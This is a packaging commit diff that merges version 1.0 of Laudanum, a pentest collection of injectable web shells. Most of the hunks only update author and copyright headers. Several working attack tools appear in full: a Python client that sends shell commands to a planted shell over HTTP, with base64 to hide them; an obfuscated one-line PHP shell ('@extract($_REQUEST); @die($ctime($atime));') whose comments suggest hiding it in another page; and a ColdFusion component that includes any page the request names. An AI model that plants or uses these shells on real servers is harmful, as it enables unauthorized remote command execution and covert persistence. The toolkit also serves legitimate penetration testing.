Commit 144199c9 authored by Sophie Brun's avatar Sophie Brun

Merge tag 'upstream/1.0+r36'

Upstream version 1.0+r36
parents c34d550f f624405e
......@@ -2,9 +2,18 @@ The Team
========================================================
- Kevin Johnson
- Project Lead
- @secureideas
- kevin@secureideas.com
- Tim Medin
- Project Lead
- @timmedin
- tim@securitywhole.com
- John Sawyer
- Project Lead
- @johnhsawyer
- john@inguardians.com
- Justin Searle
- Core Developer
......@@ -12,4 +21,4 @@ The Team
Additional Coding
========================================================
- Robin Wood
- Jason Gillam (Wordpress Plugin)
\ No newline at end of file
- Jason Gillam (Wordpress Plugin)
Laudanum: Injectable Web Exploit Code v0.8
Laudanum: Injectable Web Exploit Code v1.0
By Kevin Johnson <kjohnson@secureideas.net>
By Kevin Johnson <kjohnson@secureideas.com>
and the Laudanum Development Team
Project Website: http://laudanum.secureideas.net
Project Website: http://laudanum.professionallyevil.com
Sourceforge Site: http://sourceforge.net/projects/laudanum
SVN : svn co https://laudanum.svn.sourceforge.net/svnroot/laudanum laudanum
-------------------------------------------------------------------------------
** Copyright (C) 2014 Kevin Johnson and the Laudanum Project Team
** Copyright (C) 2015 Kevin Johnson and the Laudanum Project Team
**
** This program is free software; you can redistribute it and/or modify
** it under the terms of the GNU General Public License as published by
......
......@@ -5,19 +5,20 @@
' *** A Collection of Injectable Files used during a Penetration Test
' ***
' *** More information is available at:
' *** http://laudanum.secureideas.net
' *** http://laudanum.professionallyevil.com/
' *** laudanum@secureideas.net
' ***
' *** Project Leads:
' *** Kevin Johnson <kjohnson@secureideas.net
' *** Tim Medin <tim@counterhack.com>
' *** Kevin Johnson @secureideas <kjohnson@secureideas.com>
' *** Tim Medin @timmedin <tim@securitywhole.com>
' *** John Sawyer @johnhsawyer <john@inguardians.com>
' ***
' *** Copyright 2014 by Kevin Johnson and the Laudanum Team
' *** Copyright 2015 by The Laudanum Team
' ***
' ********************************************************************************
' ***
' *** This file provides access to DNS on the system.
' *** Written by Tim Medin <tim@counterhack.com>
' *** Written by Tim Medin <tim@securitywhole.com>
' ***
' ********************************************************************************
' *** This program is free software; you can redistribute it and/or
......
......@@ -8,19 +8,20 @@
' *** A Collection of Injectable Files used during a Penetration Test
' ***
' *** More information is available at:
' *** http://laudanum.secureideas.net
' *** http://laudanum.professionallyevil.com/
' *** laudanum@secureideas.net
' ***
' *** Project Leads:
' *** Kevin Johnson <kjohnson@secureideas.net
' *** Tim Medin <tim@counterhack.com>
' *** Kevin Johnson @secureideas <kjohnson@secureideas.com>
' *** Tim Medin @timmedin <tim@securitywhole.com>
' *** John Sawyer @johnhsawyer <john@inguardians.com>
' ***
' *** Copyright 2014 by Kevin Johnson and the Laudanum Team
' *** Copyright 2015 by The Laudanum Team
' ***
' ********************************************************************************
' ***
' *** This file provides access to the file system.
' *** Written by Tim Medin <tim@counterhack.com>
' *** Written by Tim Medin <tim@securitywhole.com>
' ***
' ********************************************************************************
' *** This program is free software; you can redistribute it and/or
......
......@@ -8,19 +8,20 @@
' *** A Collection of Injectable Files used during a Penetration Test
' ***
' *** More information is available at:
' *** http://laudanum.secureideas.net
' *** http://laudanum.professionallyevil.com/
' *** laudanum@secureideas.net
' ***
' *** Project Leads:
' *** Kevin Johnson <kjohnson@secureideas.net
' *** Tim Medin <tim@counterhack.com>
' *** Kevin Johnson @secureideas <kjohnson@secureideas.com>
' *** Tim Medin @timmedin <tim@securitywhole.com>
' *** John Sawyer @johnhsawyer <john@inguardians.com>
' ***
' *** Copyright 2014 by Kevin Johnson and the Laudanum Team
' *** Copyright 2015 by The Laudanum Team
' ***
' ********************************************************************************
' ***
' *** This file provides access as a proxy.
' *** Written by Tim Medin <tim@counterhack.com>
' *** Written by Tim Medin <tim@securitywhole.com>
' ***
' ********************************************************************************
' *** This program is free software; you can redistribute it and/or
......
......@@ -5,19 +5,20 @@
' *** A Collection of Injectable Files used during a Penetration Test
' ***
' *** More information is available at:
' *** http://laudanum.secureideas.net
' *** http://laudanum.professionallyevil.com/
' *** laudanum@secureideas.net
' ***
' *** Project Leads:
' *** Kevin Johnson <kjohnson@secureideas.net
' *** Tim Medin <tim@counterhack.com>
' *** Kevin Johnson @secureideas <kjohnson@secureideas.com>
' *** Tim Medin @timmedin <tim@securitywhole.com>
' *** John Sawyer @johnhsawyer <john@inguardians.com>
' ***
' *** Copyright 2014 by Kevin Johnson and the Laudanum Team
' *** Copyright 2015 by The Laudanum Team
' ***
' ********************************************************************************
' ***
' *** Updated and fixed by Robin Wood <Digininja>
' *** Updated and fixed by Tim Medin <tim@counterhack.com
' *** Updated and fixed by Tim Medin <tim@securitywhole.com>
' ***
' ********************************************************************************
' *** This program is free software; you can redistribute it and/or
......
......@@ -9,14 +9,15 @@
*** A Collection of Injectable Files used during a Penetration Test
***
*** More information is available at:
*** http://laudanum.secureideas.net
*** http://laudanum.professionallyevil.com/
*** laudanum@secureideas.net
***
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net>
*** Tim Medin <tim@counterhack.com>
*** Kevin Johnson @secureideas <kjohnson@secureideas.com>
*** Tim Medin @timmedin <tim@securitywhole.com>
*** John Sawyer @johnhsawyer <john@inguardians.com>
***
*** Copyright 2014 by Kevin Johnson and the Laudanum Team
*** Copyright 2015 by The Laudanum Team
***
********************************************************************************
***
......
<!---
/* *****************************************************************************
***
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
***
*** More information is available at:
*** http://laudanum.professionallyevil.com/
*** laudanum@secureideas.net
***
*** Project Leads:
*** Kevin Johnson @secureideas <kjohnson@secureideas.net
*** Tim Medin @timmedin <tim@securitywhole.com>
*** John Sawyer @johnhsawyer <john@inguardians.com>
***
*** Copyright 2015 by The Laudanum Team
***
********************************************************************************
***
*** This file provides access to shell access on the system.
*** Sourced from http://www.bennadel.com/blog/726-coldfusion-application-cfc-tutorial-and-application-cfc-reference.htm
*** Modified by Tim Medin
***
********************************************************************************
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
***
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
*** GNU General Public License for more details.
***
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1^
*** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA 02111-1307, USA.
***
***************************************************************************** */
--->
<cfcomponent
displayname="Application"
output="true"
hint="Handle the application.">
<!--- Set up the application. --->
<cfset THIS.Name = "AppCFC" />
<cfset THIS.ApplicationTimeout = CreateTimeSpan( 0, 0, 1, 0 ) />
<cfset THIS.SessionManagement = true />
<cfset THIS.SetClientCookies = false />
<!--- Define the page request properties. --->
<cfsetting
requesttimeout="20"
showdebugoutput="false"
enablecfoutputonly="false"
/>
<cffunction
name="OnApplicationStart"
access="public"
returntype="boolean"
output="false"
hint="Fires when the application is first created.">
<!--- Return out. --->
<cfreturn true />
</cffunction>
<cffunction
name="OnSessionStart"
access="public"
returntype="void"
output="false"
hint="Fires when the session is first created.">
<!--- Return out. --->
<cfreturn />
</cffunction>
<cffunction
name="OnRequestStart"
access="public"
returntype="boolean"
output="false"
hint="Fires at first part of page processing.">
<!--- Define arguments. --->
<cfargument
name="TargetPage"
type="string"
required="true"
/>
<!--- Return out. --->
<cfreturn true />
</cffunction>
<cffunction
name="OnRequest"
access="public"
returntype="void"
output="true"
hint="Fires after pre page processing is complete.">
<!--- Define arguments. --->
<cfargument
name="TargetPage"
type="string"
required="true"
/>
<!--- Include the requested page. --->
<cfinclude template="#ARGUMENTS.TargetPage#" />
<!--- Return out. --->
<cfreturn />
</cffunction>
<cffunction
name="OnRequestEnd"
access="public"
returntype="void"
output="true"
hint="Fires after the page processing is complete.">
<!--- Return out. --->
<cfreturn />
</cffunction>
<cffunction
name="OnSessionEnd"
access="public"
returntype="void"
output="false"
hint="Fires when the session is terminated.">
<!--- Define arguments. --->
<cfargument
name="SessionScope"
type="struct"
required="true"
/>
<cfargument
name="ApplicationScope"
type="struct"
required="false"
default="#StructNew()#"
/>
<!--- Return out. --->
<cfreturn />
</cffunction>
<cffunction
name="OnApplicationEnd"
access="public"
returntype="void"
output="false"
hint="Fires when the application is terminated.">
<!--- Define arguments. --->
<cfargument
name="ApplicationScope"
type="struct"
required="false"
default="#StructNew()#"
/>
<!--- Return out. --->
<cfreturn />
</cffunction>
<cffunction
name="OnError"
access="public"
returntype="void"
output="true"
hint="Fires when an exception occures that is not caught by a try/catch.">
<!--- Define arguments. --->
<cfargument
name="Exception"
type="any"
required="true"
/>
<cfargument
name="EventName"
type="string"
required="false"
default=""
/>
<!--- Return out. --->
<cfreturn />
</cffunction>
</cfcomponent>
......@@ -7,14 +7,15 @@
*** A Collection of Injectable Files used during a Penetration Test
***
*** More information is available at:
*** http://laudanum.secureideas.net
*** http://laudanum.professionallyevil.com/
*** laudanum@secureideas.net
***
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net
*** Tim Medin <tim@securitywhole.com>
*** Kevin Johnson @secureideas <kjohnson@secureideas.net
*** Tim Medin @timmedin <tim@securitywhole.com>
*** John Sawyer @johnhsawyer <john@inguardians.com>
***
*** Copyright 2014 by Kevin Johnson and the Laudanum Team
*** Copyright 2015 by The Laudanum Team
***
********************************************************************************
***
......
#!/usr/bin/env python
'''
*******************************************************************************
***
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
***
*** More information is available at:
*** http://laudanum.professionallyevil.com/
*** laudanum@secureideas.net
***
*** Project Leads:
*** Kevin Johnson @secureideas <kjohnson@secureideas.com>
*** Tim Medin @timmedin <tim@securitywhole.com>
*** John Sawyer @johnhsawyer <john@inguardians.com>
***
*** Copyright 2015 by The Laudanum Team
***
********************************************************************************
***
*** This file provides a console for working with remote shells.
*** //TODO: Add the ability to strip out extra text so only shell output is shown
*** Written by Tim Medin <tim@securitywhole.com>
***
********************************************************************************
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
***
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
*** GNU General Public License for more details.
***
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
*** You can also write to the Free Software Foundation, Inc., Temple
*** Place - Suite Boston, MA USA.
***
***************************************************************************** */
'''
import urllib2
import urllib
import base64
import re
origurl = None
origdata = None
replace = []
usebase64 = False
def sendrequest(url, data=None):
if data != None:
resp = urllib2.urlopen(url, data)
else:
resp = urllib2.urlopen(url)
html = resp.read()
resp.close()
if usebase64:
matches = re.findall('[A-Za-z0-9/+]+={0,2}', html)
for m in matches:
print base64.b64decode(m)
else:
print html
# TODO: update this to allow filtering before and after the command
def preparecmd(cmd):
global replace
global usebase64
for r in replace:
cmd = cmd.replace(r[0], r[1])
if usebase64:
cmd += ' | base64 -w 0'
cmd = urllib.quote(cmd)
return cmd
def dointeract():
global origurl
print "Type the commands to run on the remote server"
while True:
cmd = raw_input('> ')
if cmd in ['stop', 'quit', 'exit']:
break
cmd = preparecmd(cmd)
url = origurl.replace('CMD', cmd)
data = origdata.replace('CMD', cmd)
sendrequest(url, data)
def main():
global origurl
global replace
global usebase64
global origdata
import argparse
parser = argparse.ArgumentParser(description='Easy remote shell.')
parser.add_argument('-i', '--interactive', help='interactive', dest='interactive', action='store_true', default=False)
parser.add_argument('-u', '--url', required=True, help='The url', metavar='URL', dest='url')
parser.add_argument('-d', '--data', help='data to send via post', metavar='DATA', dest='data')
parser.add_argument('-c', '--cmd', help='The command to execute (use ++ instead of - unless other override is defined)', metavar='COMMAND', dest='cmd', nargs='+')
parser.add_argument('-r', '--replace', nargs=2, action='append', help='Characters to replace', dest='replace')
# not encryption, don't pretend it is or use it thusly
parser.add_argument('-b', '--base64', help='Attempt to hide with base64 encoded (*Nix Only(', dest='base64', action='store_true', default=False)
args = parser.parse_args()
origurl = args.url
origdata = args.data if args.data else ''
replace = args.replace if args.replace else []
usebase64 = args.base64
if not args.interactive and args.cmd == None:
parser.print_help()
print 'argument -c/--cmd or -i/--interactive are required'
exit(0)
if args.cmd:
#check for the default overrite
if replace and [r[1] for r in replace if r[1]=='-']:
print 'override of - found, ignoring ++'
else:
replace.append(['++', '-'])
cmd = preparecmd(' '.join(args.cmd))
url = origurl.replace('CMD', cmd)
data = origdata.replace('CMD', cmd)
sendrequest(url, data)
if args.interactive:
try:
import readline
except:
pass
dointeract()
if __name__ == '__main__':
main()
\ No newline at end of file
<%@ page import="java.util.*,java.io.*"%>
<%
/*
*******************************************************************************
***
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
***
*** More information is available at:
*** http://laudanum.professionallyevil.com/
*** laudanum@secureideas.net
***
*** Project Leads:
*** Kevin Johnson @secureideas <kjohnson@secureideas.com>
*** Tim Medin @timmedin <tim@securitywhole.com>
*** John Sawyer @johnhsawyer <john@inguardians.com>
***
*** Copyright 2015 by The Laudanum Team
***
********************************************************************************
***
*** This file provides access to shell access to the system.
*** Written by Tim Medin <tim@securitywhole.com>
***
********************************************************************************
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
***
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
*** GNU General Public License for more details.
***
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
*** You can also write to the Free Software Foundation, Inc., Temple
*** Place - Suite Boston, MA USA.
***
*****************************************************************************
*/
if (request.getRemoteAddr() != "4.4.4.4") {
response.sendError(HttpServletResponse.SC_NOT_FOUND)
return;
......
......@@ -5,19 +5,20 @@
*** A Collection of Injectable Files used during a Penetration Test
***
*** More information is available at:
*** http://laudanum.secureideas.net
*** http://laudanum.professionallyevil.com/
*** laudanum@secureideas.net
***
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net
*** Tim Medin <tim@counterhack.com>
*** Kevin Johnson @secureideas <kjohnson@secureideas.com>
*** Tim Medin @timmedin <tim@securitywhole.com>
*** John Sawyer @johnhsawyer <john@inguardians.com>
***
*** Copyright 2014 by Kevin Johnson and the Laudanum Team
*** Copyright 2015 by The Laudanum Team
***
********************************************************************************
***
*** This file provides access to DNS on the system.
*** Written by Tim Medin <tim@counterhack.com>
*** Written by Tim Medin <tim@securitywhole.com>
***
********************************************************************************
*** This program is free software; you can redistribute it and/or
......
......@@ -5,19 +5,20 @@
*** A Collection of Injectable Files used during a Penetration Test
***
*** More information is available at:
*** http://laudanum.secureideas.net
*** http://laudanum.professionallyevil.com/
*** laudanum@secureideas.net
***
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net
*** Tim Medin <tim@counterhack.com>
*** Kevin Johnson @secureideas <kjohnson@secureideas.com>
*** Tim Medin @timmedin <tim@securitywhole.com>
*** John Sawyer @johnhsawyer <john@inguardians.com>
***
*** Copyright 2014 by Kevin Johnson and the Laudanum Team
*** Copyright 2015 by The Laudanum Team
***
********************************************************************************
***
*** This file allows browsing of the file system.
*** Written by Tim Medin <tim@counterhack.com>
*** Written by Tim Medin <tim@securitywhole.com>
*** 2013-12-28 Updated by Jason Gillam - fixed parent folder
***
********************************************************************************
......
<?php
/*
******************************************************************************
***
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
***
*** More information is available at:
*** http://laudanum.professionallyevil.com/
*** laudanum@secureideas.net
***
*** Project Leads:
*** Kevin Johnson @secureideas <kjohnson@secureideas.com>
*** Tim Medin @timmedin <tim@securitywhole.com>
*** John Sawyer @johnhsawyer <john@inguardians.com>
***
*** Copyright 2015 by The Laudanum Team
***
********************************************************************************
***
*** This file provides access to the file system.
*** Written by Tim Medin <tim@securitywhole.com>
***
********************************************************************************
***
*** This is a tiny shell that is well obfuscated
*** to use it run it thusly:
***  http://Site/shell.php?ctime=system&atime=ls+-la
*** It is best hidden in another php page
***
*** WARNING: This shell is not protected by an ip filter or credential check
********************************************************************************
*/
@extract($_REQUEST);
@die ($ctime($atime));
......@@ -5,14 +5,15 @@
*** A Collection of Injectable Files used during a Penetration Test
***
*** More information is available at:
*** http://laudanum.secureideas.net
*** http://laudanum.professionallyevil.com/
*** laudanum@secureideas.net
***
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net
*** Tim Medin <tim@counterhack.com>
*** Kevin Johnson @secureideas <kjohnson@secureideas.com>
*** Tim Medin @timmedin <tim@securitywhole.com>
*** John Sawyer @johnhsawyer <john@inguardians.com>
***
*** Copyright 2014 by Kevin Johnson and the Laudanum Team
*** Copyright 2015 by The Laudanum Team
***
********************************************************************************
***
......
......@@ -5,14 +5,15 @@
*** A Collection of Injectable Files used during a Penetration Test
***
*** More information is available at:
*** http://laudanum.secureideas.net
*** http://laudanum.professionallyevil.com/
*** laudanum@secureideas.net
***
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net>
*** Tim Medin <tim@counterhack.com>
*** Kevin Johnson @secureideas <kjohnson@secureideas.com>
*** Tim Medin @timmedin <tim@securitywhole.com>
*** John Sawyer @johnhsawyer <john@inguardians.com>
***
*** Copyright 2014 by Kevin Johnson and the Laudanum Team
*** Copyright 2015 by The Laudanum Team
***
********************************************************************************
***
......
......@@ -6,19 +6,20 @@ ini_set('session.use_cookies', '0');
*** A Collection of Injectable Files used during a Penetration Test
***
*** More information is available at:
*** http://laudanum.secureideas.net
*** http://laudanum.professionallyevil.com/
*** laudanum@secureideas.net
***
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net
*** Tim Medin <tim@counterhack.com>
*** Kevin Johnson @secureideas <kjohnson@secureideas.com>
*** Tim Medin @timmedin <tim@securitywhole.com>
*** John Sawyer @johnhsawyer <john@inguardians.com>
***